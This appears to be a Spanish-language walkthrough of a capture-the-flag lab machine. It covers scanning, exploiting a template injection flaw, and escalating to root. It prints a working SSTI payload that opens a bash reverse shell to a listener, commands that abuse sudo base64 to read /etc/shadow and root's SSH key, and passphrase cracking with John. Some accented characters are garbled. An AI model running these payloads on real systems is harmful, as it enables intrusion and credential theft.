# Verdejo
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 172.17.0.2
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** y el **puerto 8089** perteneciente al **servicio HTTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 **EXPLORACI脫N**
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80,8089 -v 172.17.0.2
```
para obtener m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web sea la de por defecto de **Apache**.
Vemos a ver que corre por el **puerto 8089**.
Si enviamos el texto nos sale esto.
### 馃殌 **EXPLOTACI脫N**
Comenzamos verificando si es posible ejecutar un ataque XSS.
```bash
```
Probamos si es propenso a un SSTI por lo que realizamos una operaci贸n matem谩tica que deber谩 mostrar el resultado.
```
{{7*7}}
```
Por lo que aprovechamos eso para enviarnos una Reverse Shell.
```bash
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.255.136/443 0>&1\'').read() }}
```
Nos ponemos en escucha.
```bash
nc -lvnp 443
```
Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar m谩s c贸modos.
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar.
Tenemos permisos **SUDO** con **base64** por lo que revisamos esta [p谩gina ](https://gtfobins.github.io/gtfobins/base64/)para escalar privilegios.
```bash
sudo base64 /etc/shadow | base64 --decode
```
Durante el escaneo, notamos que el puerto SSH estaba abierto. Esto sugiere la posibilidad de que el usuario root tenga un archivo `id_rsa`. Al intentar leer este archivo utilizando la ruta predeterminada, confirmamos que efectivamente obtuvimos el `id_rsa`.
```bash
sudo base64 /root/.ssh/id_rsa | base64 --decode
```
Transferimos el archivo a nuestra m谩quina local y, tras asignarle permisos de ejecuci贸n, intentamos establecer la conexi贸n. Sin embargo, se nos solicit贸 la contrase帽a asociada al `id_rsa`.
```bash
chmod 600 id_rsa
```
En este paso, utilizamos **ssh2john** para extraer el hash del archivo. Posteriormente, empleamos **John the Ripper** para descifrar la contrase帽a, siempre que esta se encuentre en nuestro diccionario. Despu茅s de un tiempo, logramos identificar la clave
```bash
ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
```
Nos logueamos y metemos las credenciales. Ya somos **root**.
